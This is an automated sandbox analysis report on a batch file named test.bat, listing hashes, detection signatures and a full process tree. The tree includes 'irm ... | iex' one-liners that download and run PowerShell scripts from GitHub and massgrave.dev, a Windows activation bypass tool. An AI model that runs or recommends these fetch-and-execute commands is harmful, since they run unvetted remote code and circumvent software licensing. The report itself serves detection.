Resubmissions
23-05-2023 13:55
230523-q8krnsfe54 323-05-2023 13:40
230523-qyzg3sgd21 823-05-2023 13:38
230523-qxc8fsgd2w 823-05-2023 12:40
230523-pwbskafc46 10Analysis
-
max time kernel
472s -
max time network
470s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2023 12:40
Static task
static1
Behavioral task
behavioral1
Sample
test.bat
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
test.bat
Resource
win10v2004-20230220-en
General
-
Target
test.bat
-
Size
370B
-
MD5
1157be1803e2f740eec3a0c69aa44625
-
SHA1
5963efa7895a6748e74f0aeb94a3b3856787b8c5
-
SHA256
42c77f89ea1a298098ecf3e8939f6c5ccd005742d0482047ee26fbf56728c684
-
SHA512
04d698560789eb87f9fdbc32468557d05655558d289749f263fba4cdeb26b1cf83c214c316d60184856a935a9da757a62c361ca8e41804b59606a068a18f3899
Malware Config
Extracted
https://raw.githubusercontent.com/SteavenToolBox/Windows/main/Scripts/runtime.ps1
Signatures
-
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
pid Process 4836 bcdedit.exe -
Blocklisted process makes network request 30 IoCs
flow pid Process 41 4188 powershell.exe 42 4188 powershell.exe 47 4188 powershell.exe 57 1904 powershell.exe 58 1904 powershell.exe 76 3636 powershell.exe 77 3636 powershell.exe 78 3636 powershell.exe 104 2804 powershell.exe 107 2804 powershell.exe 109 2804 powershell.exe 111 2804 powershell.exe 124 4824 powershell.exe 125 4824 powershell.exe 126 4824 powershell.exe 127 2308 powershell.exe 128 2308 powershell.exe 129 2308 powershell.exe 130 4544 powershell.exe 131 4544 powershell.exe 132 4544 powershell.exe 133 3180 powershell.exe 134 3180 powershell.exe 135 3180 powershell.exe 137 5072 powershell.exe 138 5072 powershell.exe 140 1856 powershell.exe 141 1856 powershell.exe 142 1856 powershell.exe 143 1856 powershell.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 2 IoCs
pid Process 3600 dismhost.exe 4600 dismhost.exe -
Loads dropped DLL 24 IoCs
pid Process 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 3600 dismhost.exe 4600 dismhost.exe 4600 dismhost.exe 4600 dismhost.exe 4600 dismhost.exe 4600 dismhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File opened for modification C:\Windows\Logs\DISM\dism.log wsl.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe -
Launches sc.exe 45 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3312 sc.exe 4128 sc.exe 2956 sc.exe 716 sc.exe 8 sc.exe 648 sc.exe 3376 sc.exe 696 sc.exe 3656 sc.exe 3636 sc.exe 4552 sc.exe 2432 sc.exe 3352 sc.exe 3544 sc.exe 3012 sc.exe 1864 sc.exe 1476 sc.exe 180 sc.exe 4812 sc.exe 2092 sc.exe 2792 sc.exe 872 sc.exe 1700 sc.exe 1948 sc.exe 508 sc.exe 1720 sc.exe 472 sc.exe 1488 sc.exe 3852 sc.exe 3992 sc.exe 3524 sc.exe 392 sc.exe 4340 sc.exe 3000 sc.exe 1224 sc.exe 3904 sc.exe 3048 sc.exe 2640 sc.exe 2956 sc.exe 3900 sc.exe 1584 sc.exe 4040 sc.exe 4400 sc.exe 4264 sc.exe 1636 sc.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 4992 2804 WerFault.exe 313 1316 1856 WerFault.exe 457 -
Checks SCSI registry key(s) 3 TTPs 23 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs clipup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs Clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs Clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID clipup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs clipup.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 msinfo32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 msinfo32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 Clipup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 Clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID Clipup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID Clipup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID clipup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f9d6c693febb2fce0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f9d6c6930000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900f9d6c693000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f9d6c69300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f9d6c69300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID msinfo32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs msinfo32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Integrator.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msinfo32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msinfo32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease msinfo32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease msinfo32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Integrator.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Keyboard reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Control Panel\Keyboard\InitialKeyboardIndicators = "558319670" reg.exe Key deleted \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03 reg.exe Key deleted \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663 reg.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 60 IoCs
pid Process 4536 reg.exe 1760 reg.exe 932 reg.exe 3772 reg.exe 992 reg.exe 4896 reg.exe 4336 reg.exe 1808 reg.exe 2260 reg.exe 2076 reg.exe 2008 reg.exe 2272 reg.exe 4336 reg.exe 3516 reg.exe 1360 reg.exe 3528 reg.exe 2076 reg.exe 2832 reg.exe 932 reg.exe 760 reg.exe 4780 reg.exe 1196 reg.exe 4508 reg.exe 576 reg.exe 800 reg.exe 3732 reg.exe 4816 reg.exe 1840 reg.exe 4552 reg.exe 1840 reg.exe 2716 reg.exe 5016 reg.exe 4552 reg.exe 1040 reg.exe 3636 reg.exe 3348 reg.exe 1712 reg.exe 1856 reg.exe 4144 reg.exe 4020 reg.exe 3760 reg.exe 3412 reg.exe 2256 reg.exe 2412 reg.exe 3772 reg.exe 1892 reg.exe 588 reg.exe 872 reg.exe 4136 reg.exe 3580 reg.exe 4780 reg.exe 1312 reg.exe 3236 reg.exe 1596 reg.exe 3892 reg.exe 436 reg.exe 3048 reg.exe 4340 reg.exe 3828 reg.exe 2600 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4616 NOTEPAD.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
pid Process 1808 PING.EXE 2332 PING.EXE 1120 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4188 powershell.exe 4188 powershell.exe 1064 powershell.exe 1064 powershell.exe 1904 powershell.exe 1904 powershell.exe 2960 powershell.exe 2960 powershell.exe 2636 powershell.exe 2636 powershell.exe 2924 powershell.exe 2924 powershell.exe 404 powershell.exe 404 powershell.exe 3636 powershell.exe 3636 powershell.exe 3824 powershell.exe 3824 powershell.exe 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 4824 powershell.exe 4824 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 2308 powershell.exe 2308 powershell.exe 2308 powershell.exe 2588 powershell.exe 2588 powershell.exe 2588 powershell.exe 4544 powershell.exe 4544 powershell.exe 4544 powershell.exe 1756 powershell.exe 1756 powershell.exe 1756 powershell.exe 3180 powershell.exe 3180 powershell.exe 3180 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 332 powershell.exe 332 powershell.exe 332 powershell.exe 3764 powershell.exe 3764 powershell.exe 3764 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 4604 powershell.exe 4604 powershell.exe 4604 powershell.exe 768 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1928 msinfo32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeIncreaseQuotaPrivilege 2720 WMIC.exe Token: SeSecurityPrivilege 2720 WMIC.exe Token: SeTakeOwnershipPrivilege 2720 WMIC.exe Token: SeLoadDriverPrivilege 2720 WMIC.exe Token: SeSystemProfilePrivilege 2720 WMIC.exe Token: SeSystemtimePrivilege 2720 WMIC.exe Token: SeProfSingleProcessPrivilege 2720 WMIC.exe Token: SeIncBasePriorityPrivilege 2720 WMIC.exe Token: SeCreatePagefilePrivilege 2720 WMIC.exe Token: SeBackupPrivilege 2720 WMIC.exe Token: SeRestorePrivilege 2720 WMIC.exe Token: SeShutdownPrivilege 2720 WMIC.exe Token: SeDebugPrivilege 2720 WMIC.exe Token: SeSystemEnvironmentPrivilege 2720 WMIC.exe Token: SeRemoteShutdownPrivilege 2720 WMIC.exe Token: SeUndockPrivilege 2720 WMIC.exe Token: SeManageVolumePrivilege 2720 WMIC.exe Token: 33 2720 WMIC.exe Token: 34 2720 WMIC.exe Token: 35 2720 WMIC.exe Token: 36 2720 WMIC.exe Token: SeIncreaseQuotaPrivilege 2720 WMIC.exe Token: SeSecurityPrivilege 2720 WMIC.exe Token: SeTakeOwnershipPrivilege 2720 WMIC.exe Token: SeLoadDriverPrivilege 2720 WMIC.exe Token: SeSystemProfilePrivilege 2720 WMIC.exe Token: SeSystemtimePrivilege 2720 WMIC.exe Token: SeProfSingleProcessPrivilege 2720 WMIC.exe Token: SeIncBasePriorityPrivilege 2720 WMIC.exe Token: SeCreatePagefilePrivilege 2720 WMIC.exe Token: SeBackupPrivilege 2720 WMIC.exe Token: SeRestorePrivilege 2720 WMIC.exe Token: SeShutdownPrivilege 2720 WMIC.exe Token: SeDebugPrivilege 2720 WMIC.exe Token: SeSystemEnvironmentPrivilege 2720 WMIC.exe Token: SeRemoteShutdownPrivilege 2720 WMIC.exe Token: SeUndockPrivilege 2720 WMIC.exe Token: SeManageVolumePrivilege 2720 WMIC.exe Token: 33 2720 WMIC.exe Token: 34 2720 WMIC.exe Token: 35 2720 WMIC.exe Token: 36 2720 WMIC.exe Token: SeIncreaseQuotaPrivilege 380 WMIC.exe Token: SeSecurityPrivilege 380 WMIC.exe Token: SeTakeOwnershipPrivilege 380 WMIC.exe Token: SeLoadDriverPrivilege 380 WMIC.exe Token: SeSystemProfilePrivilege 380 WMIC.exe Token: SeSystemtimePrivilege 380 WMIC.exe Token: SeProfSingleProcessPrivilege 380 WMIC.exe Token: SeIncBasePriorityPrivilege 380 WMIC.exe Token: SeCreatePagefilePrivilege 380 WMIC.exe Token: SeBackupPrivilege 380 WMIC.exe Token: SeRestorePrivilege 380 WMIC.exe Token: SeShutdownPrivilege 380 WMIC.exe Token: SeDebugPrivilege 380 WMIC.exe Token: SeSystemEnvironmentPrivilege 380 WMIC.exe Token: SeRemoteShutdownPrivilege 380 WMIC.exe Token: SeUndockPrivilege 380 WMIC.exe Token: SeManageVolumePrivilege 380 WMIC.exe Token: 33 380 WMIC.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1300 OpenWith.exe 2600 OpenWith.exe 3728 Integrator.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1656 wrote to memory of 4152 1656 cmd.exe 85 PID 1656 wrote to memory of 4152 1656 cmd.exe 85 PID 1656 wrote to memory of 4520 1656 cmd.exe 86 PID 1656 wrote to memory of 4520 1656 cmd.exe 86 PID 1656 wrote to memory of 1188 1656 cmd.exe 87 PID 1656 wrote to memory of 1188 1656 cmd.exe 87 PID 1656 wrote to memory of 1324 1656 cmd.exe 88 PID 1656 wrote to memory of 1324 1656 cmd.exe 88 PID 4848 wrote to memory of 3600 4848 cmd.exe 102 PID 4848 wrote to memory of 3600 4848 cmd.exe 102 PID 4848 wrote to memory of 4156 4848 cmd.exe 101 PID 4848 wrote to memory of 4156 4848 cmd.exe 101 PID 4848 wrote to memory of 5008 4848 cmd.exe 103 PID 4848 wrote to memory of 5008 4848 cmd.exe 103 PID 4848 wrote to memory of 4948 4848 cmd.exe 104 PID 4848 wrote to memory of 4948 4848 cmd.exe 104 PID 2852 wrote to memory of 4188 2852 cmd.exe 109 PID 2852 wrote to memory of 4188 2852 cmd.exe 109 PID 4188 wrote to memory of 1064 4188 powershell.exe 110 PID 4188 wrote to memory of 1064 4188 powershell.exe 110 PID 1064 wrote to memory of 1484 1064 powershell.exe 111 PID 1064 wrote to memory of 1484 1064 powershell.exe 111 PID 1484 wrote to memory of 1704 1484 cmd.exe 112 PID 1484 wrote to memory of 1704 1484 cmd.exe 112 PID 1484 wrote to memory of 1668 1484 cmd.exe 113 PID 1484 wrote to memory of 1668 1484 cmd.exe 113 PID 1484 wrote to memory of 1904 1484 cmd.exe 114 PID 1484 wrote to memory of 1904 1484 cmd.exe 114 PID 1904 wrote to memory of 4452 1904 powershell.exe 115 PID 1904 wrote to memory of 4452 1904 powershell.exe 115 PID 4452 wrote to memory of 220 4452 cmd.exe 117 PID 4452 wrote to memory of 220 4452 cmd.exe 117 PID 4452 wrote to memory of 100 4452 cmd.exe 118 PID 4452 wrote to memory of 100 4452 cmd.exe 118 PID 4452 wrote to memory of 3780 4452 cmd.exe 119 PID 4452 wrote to memory of 3780 4452 cmd.exe 119 PID 4452 wrote to memory of 3784 4452 cmd.exe 120 PID 4452 wrote to memory of 3784 4452 cmd.exe 120 PID 4452 wrote to memory of 1116 4452 cmd.exe 121 PID 4452 wrote to memory of 1116 4452 cmd.exe 121 PID 1116 wrote to memory of 332 1116 cmd.exe 122 PID 1116 wrote to memory of 332 1116 cmd.exe 122 PID 1116 wrote to memory of 3880 1116 cmd.exe 123 PID 1116 wrote to memory of 3880 1116 cmd.exe 123 PID 4452 wrote to memory of 700 4452 cmd.exe 124 PID 4452 wrote to memory of 700 4452 cmd.exe 124 PID 4452 wrote to memory of 3288 4452 cmd.exe 125 PID 4452 wrote to memory of 3288 4452 cmd.exe 125 PID 4452 wrote to memory of 4340 4452 cmd.exe 126 PID 4452 wrote to memory of 4340 4452 cmd.exe 126 PID 4452 wrote to memory of 5000 4452 cmd.exe 127 PID 4452 wrote to memory of 5000 4452 cmd.exe 127 PID 5000 wrote to memory of 3908 5000 cmd.exe 128 PID 5000 wrote to memory of 3908 5000 cmd.exe 128 PID 4452 wrote to memory of 1520 4452 cmd.exe 129 PID 4452 wrote to memory of 1520 4452 cmd.exe 129 PID 4452 wrote to memory of 3600 4452 cmd.exe 130 PID 4452 wrote to memory of 3600 4452 cmd.exe 130 PID 4452 wrote to memory of 4908 4452 cmd.exe 131 PID 4452 wrote to memory of 4908 4452 cmd.exe 131 PID 4452 wrote to memory of 4996 4452 cmd.exe 132 PID 4452 wrote to memory of 4996 4452 cmd.exe 132 PID 4452 wrote to memory of 3000 4452 cmd.exe 133 PID 4452 wrote to memory of 3000 4452 cmd.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "2⤵PID:4152
-
-
C:\Windows\system32\findstr.exefindstr /i "10\.0\.19045\."2⤵PID:4520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "2⤵PID:1188
-
-
C:\Windows\system32\findstr.exefindstr /i "6\.1\."2⤵PID:1324
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\findstr.exefindstr /i "10\.0\.19045\."2⤵PID:4156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "2⤵PID:3600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "2⤵PID:5008
-
-
C:\Windows\system32\findstr.exefindstr /i "6\.1\."2⤵PID:4948
-
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\test.bat1⤵
- Opens file in notepad (likely ransom note)
PID:4616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm github.com/SteavenToolBox/Windows/raw/main/SteavenToolBox.ps1 | iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\windows\temp\SteavenToolBox.cmd3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\temp\SteavenToolBox.cmd""4⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\reg.exeReg.exe query "HKU\S-1-5-19\Environment"5⤵PID:1704
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "VerboseStatus" /t REG_DWORD /d "1" /f5⤵PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm https://massgrave.dev/get | iex"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\MAS_204.cmd" "6⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\System32\findstr.exefindstr /rxc:".*" "MAS_204.cmd"7⤵PID:220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ver7⤵PID:100
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV27⤵PID:3780
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:3784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo prompt $E | cmd7⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "8⤵PID:332
-
-
C:\Windows\System32\cmd.execmd8⤵PID:3880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_204.cmd" "7⤵PID:700
-
-
C:\Windows\System32\find.exefind /i "C:\Users\Admin\AppData\Local\Temp"7⤵PID:3288
-
-
C:\Windows\System32\fltMC.exefltmc7⤵PID:4340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop7⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\System32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop8⤵PID:3908
-
-
-
C:\Windows\System32\mode.commode 76, 307⤵PID:1520
-
-
C:\Windows\System32\choice.exechoice /C:12345670 /N7⤵PID:3600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ver7⤵PID:4908
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV27⤵PID:4996
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:3000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo prompt $E | cmd7⤵PID:4752
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "8⤵PID:1788
-
-
C:\Windows\System32\cmd.execmd8⤵PID:4896
-
-
-
C:\Windows\System32\mode.commode 102, 347⤵PID:2416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"7⤵PID:4260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "Windows 10 Pro" "7⤵PID:4264
-
-
C:\Windows\System32\find.exefind /i "Windows"7⤵PID:3960
-
-
C:\Windows\System32\wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\find.exefind /i "computersystem"7⤵PID:1932
-
-
C:\Windows\System32\sc.exesc start sppsvc7⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\System32\wbem\WMIC.exewmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL) get Name /value7⤵
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
C:\Windows\System32\findstr.exefindstr /i "Windows"7⤵PID:4728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn 2>nul7⤵PID:2636
-
C:\Windows\System32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn8⤵PID:1708
-
-
-
